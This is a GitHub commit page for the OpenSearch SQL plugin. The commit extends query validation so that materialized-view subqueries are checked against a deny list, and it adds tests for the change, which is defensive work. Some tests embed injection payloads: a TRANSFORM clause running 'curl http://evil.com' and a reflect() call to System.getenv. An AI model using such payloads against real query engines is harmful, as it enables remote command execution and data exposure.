Skip to content

Commit 25529e7

Browse files
authored
[Enhancement] Validate materialized view subqueries against SQL grammar deny list (opensearch-project#5485)
Signed-off-by: Jialiang Liang <jiallian@amazon.com>
1 parent 9300574 commit 25529e7

4 files changed

Lines changed: 186 additions & 5 deletions

File tree

async-query-core/src/main/java/org/opensearch/sql/spark/validator/FunctionType.java

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -184,6 +184,7 @@ public enum FunctionType {
184184
"from_unixtime",
185185
"from_utc_timestamp",
186186
"hour",
187+
"hop",
187188
"last_day",
188189
"localtimestamp",
189190
"make_date",
@@ -211,6 +212,7 @@ public enum FunctionType {
211212
"to_unix_timestamp",
212213
"to_utc_timestamp",
213214
"trunc",
215+
"tumble",
214216
"try_to_timestamp",
215217
"unix_date",
216218
"unix_micros",

async-query-core/src/main/java/org/opensearch/sql/spark/validator/SQLQueryValidator.java

Lines changed: 11 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,7 @@
99
import org.apache.logging.log4j.LogManager;
1010
import org.apache.logging.log4j.Logger;
1111
import org.opensearch.sql.datasource.model.DataSourceType;
12+
import org.opensearch.sql.spark.dispatcher.model.IndexQueryDetails;
1213
import org.opensearch.sql.spark.utils.SQLQueryUtils;
1314

1415
/** Validate input SQL query based on the DataSourceType. */
@@ -38,10 +39,18 @@ public void validate(String sqlQuery, DataSourceType datasourceType) {
3839
}
3940

4041
/**
41-
* Validates a query from the Flint extension grammar. The method is currently a no-op.
42+
* Validates a Flint extension query by extracting and validating any embedded SQL subquery. For
43+
* CREATE MATERIALIZED VIEW statements, the inner query is validated against the same deny list
44+
* used for standard SQL queries.
4245
*
4346
* @param sqlQuery The Flint extension query to be validated
4447
* @param dataSourceType The type of the datasource the query is being run on
4548
*/
46-
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {}
49+
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {
50+
IndexQueryDetails indexQueryDetails = SQLQueryUtils.extractIndexDetails(sqlQuery);
51+
String mvQuery = indexQueryDetails.getMvQuery();
52+
if (mvQuery != null) {
53+
validate(mvQuery, dataSourceType);
54+
}
55+
}
4756
}

async-query-core/src/test/java/org/opensearch/sql/spark/dispatcher/SparkQueryDispatcherTest.java

Lines changed: 71 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -501,6 +501,77 @@ void testDispatchShowMVQuery() {
501501
testDispatchBatchQuery("SHOW MATERIALIZED VIEW IN mys3.default");
502502
}
503503

504+
@Test
505+
void testDispatchMVWithWindowFunctionAllowed() {
506+
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
507+
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
508+
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
509+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
510+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
511+
MY_GLUE, asyncQueryRequestContext))
512+
.thenReturn(dataSourceMetadata);
513+
514+
String query =
515+
"CREATE MATERIALIZED VIEW my_glue.default.mv_window AS"
516+
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
517+
+ " FROM my_glue.default.http_logs WHERE status != 200"
518+
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
519+
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
520+
+ " checkpoint_location = 's3://bucket/checkpoint',"
521+
+ " watermark_delay = '10 Minutes')";
522+
523+
DispatchQueryResponse response =
524+
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
525+
verify(emrServerlessClient, times(1)).startJobRun(any());
526+
assertEquals(EMR_JOB_ID, response.getJobId());
527+
}
528+
529+
@Test
530+
void testDispatchMVWithTumbleFunctionAllowed() {
531+
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
532+
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
533+
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
534+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
535+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
536+
MY_GLUE, asyncQueryRequestContext))
537+
.thenReturn(dataSourceMetadata);
538+
539+
String query =
540+
"CREATE MATERIALIZED VIEW my_glue.default.mv_tumble AS"
541+
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
542+
+ " FROM my_glue.default.http_logs WHERE status != 200"
543+
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
544+
+ " WITH (auto_refresh = false)";
545+
546+
DispatchQueryResponse response =
547+
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
548+
verify(emrServerlessClient, times(1)).startJobRun(any());
549+
assertEquals(EMR_JOB_ID, response.getJobId());
550+
}
551+
552+
@Test
553+
void testDispatchMVWithTransformBlocked() {
554+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
555+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
556+
MY_GLUE, asyncQueryRequestContext))
557+
.thenReturn(dataSourceMetadata);
558+
559+
String query =
560+
"CREATE MATERIALIZED VIEW my_glue.default.mv_exploit AS"
561+
+ " SELECT TRANSFORM(status) USING 'curl http://evil.com' AS x"
562+
+ " FROM my_glue.default.http_logs"
563+
+ " WITH (auto_refresh = false)";
564+
565+
IllegalArgumentException exception =
566+
Assertions.assertThrows(
567+
IllegalArgumentException.class,
568+
() ->
569+
sparkQueryDispatcher.dispatch(
570+
getBaseDispatchQueryRequest(query), asyncQueryRequestContext));
571+
Assertions.assertTrue(exception.getMessage().contains("TRANSFORM is not allowed"));
572+
verifyNoInteractions(emrServerlessClient);
573+
}
574+
504575
@Test
505576
void testRefreshIndexQuery() {
506577
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);

async-query-core/src/test/java/org/opensearch/sql/spark/validator/SQLQueryValidatorTest.java

Lines changed: 102 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,6 @@
1212
import static org.mockito.Mockito.when;
1313

1414
import java.util.Arrays;
15-
import java.util.UUID;
1615
import lombok.AllArgsConstructor;
1716
import lombok.Getter;
1817
import org.antlr.v4.runtime.CommonTokenStream;
@@ -577,11 +576,111 @@ void testSecurityLakeQueries() {
577576
}
578577

579578
@Test
580-
void testValidateFlintExtensionQuery() {
579+
void testValidateFlintExtensionQuery_safeQuery() {
580+
when(mockedProvider.getValidatorForDatasource(any()))
581+
.thenReturn(new S3GlueSQLGrammarElementValidator());
582+
assertDoesNotThrow(
583+
() ->
584+
sqlQueryValidator.validateFlintExtensionQuery(
585+
"CREATE MATERIALIZED VIEW mv AS select * from table WITH (auto_refresh = false)",
586+
DataSourceType.S3GLUE));
587+
}
588+
589+
@Test
590+
void testValidateFlintExtensionQuery_blocksTransformInMV() {
591+
when(mockedProvider.getValidatorForDatasource(any()))
592+
.thenReturn(new S3GlueSQLGrammarElementValidator());
593+
assertThrows(
594+
IllegalArgumentException.class,
595+
() ->
596+
sqlQueryValidator.validateFlintExtensionQuery(
597+
"CREATE MATERIALIZED VIEW mv AS SELECT TRANSFORM(id) USING 'cmd' AS x FROM tbl"
598+
+ " WITH (auto_refresh = false)",
599+
DataSourceType.S3GLUE));
600+
}
601+
602+
@Test
603+
void testValidateFlintExtensionQuery_blocksReflectInMV() {
604+
when(mockedProvider.getValidatorForDatasource(any()))
605+
.thenReturn(new S3GlueSQLGrammarElementValidator());
606+
assertThrows(
607+
IllegalArgumentException.class,
608+
() ->
609+
sqlQueryValidator.validateFlintExtensionQuery(
610+
"CREATE MATERIALIZED VIEW mv AS SELECT reflect('java.lang.System', 'getenv',"
611+
+ " 'PATH') FROM tbl WITH (auto_refresh = false)",
612+
DataSourceType.S3GLUE));
613+
}
614+
615+
@Test
616+
void testValidateFlintExtensionQuery_nonMVStatementsPass() {
617+
assertDoesNotThrow(
618+
() ->
619+
sqlQueryValidator.validateFlintExtensionQuery(
620+
"DROP MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
621+
assertDoesNotThrow(
622+
() ->
623+
sqlQueryValidator.validateFlintExtensionQuery(
624+
"REFRESH MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
625+
assertDoesNotThrow(
626+
() ->
627+
sqlQueryValidator.validateFlintExtensionQuery(
628+
"CREATE SKIPPING INDEX ON tbl (col VALUE_SET)", DataSourceType.S3GLUE));
629+
}
630+
631+
@Test
632+
void testValidateFlintExtensionQuery_mvWithWindowFunction() {
633+
when(mockedProvider.getValidatorForDatasource(any()))
634+
.thenReturn(new S3GlueSQLGrammarElementValidator());
635+
assertDoesNotThrow(
636+
() ->
637+
sqlQueryValidator.validateFlintExtensionQuery(
638+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
639+
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
640+
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
641+
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
642+
+ " checkpoint_location = 's3://bucket/checkpoint',"
643+
+ " watermark_delay = '10 Minutes')",
644+
DataSourceType.S3GLUE));
645+
}
646+
647+
@Test
648+
void testValidateFlintExtensionQuery_mvWithTumbleFunction() {
649+
when(mockedProvider.getValidatorForDatasource(any()))
650+
.thenReturn(new S3GlueSQLGrammarElementValidator());
651+
assertDoesNotThrow(
652+
() ->
653+
sqlQueryValidator.validateFlintExtensionQuery(
654+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
655+
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
656+
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
657+
+ " WITH (auto_refresh = false)",
658+
DataSourceType.S3GLUE));
659+
}
660+
661+
@Test
662+
void testValidateFlintExtensionQuery_mvWithHopFunction() {
663+
when(mockedProvider.getValidatorForDatasource(any()))
664+
.thenReturn(new S3GlueSQLGrammarElementValidator());
665+
assertDoesNotThrow(
666+
() ->
667+
sqlQueryValidator.validateFlintExtensionQuery(
668+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
669+
+ " COUNT(*) AS count FROM ds.default.http_logs"
670+
+ " GROUP BY HOP(`@timestamp`, '5 Minutes', '10 Minutes')"
671+
+ " WITH (auto_refresh = false)",
672+
DataSourceType.S3GLUE));
673+
}
674+
675+
@Test
676+
void testValidateFlintExtensionQuery_coveringIndexPass() {
581677
assertDoesNotThrow(
582678
() ->
583679
sqlQueryValidator.validateFlintExtensionQuery(
584-
UUID.randomUUID().toString(), DataSourceType.SECURITY_LAKE));
680+
"CREATE INDEX idx ON ds.default.http_logs (status, day, clientip)"
681+
+ " WITH (auto_refresh = true, refresh_interval = '5 minute',"
682+
+ " checkpoint_location = 's3://bucket/checkpoint')",
683+
DataSourceType.S3GLUE));
585684
}
586685

587686
@Test

0 commit comments

Comments
 (0)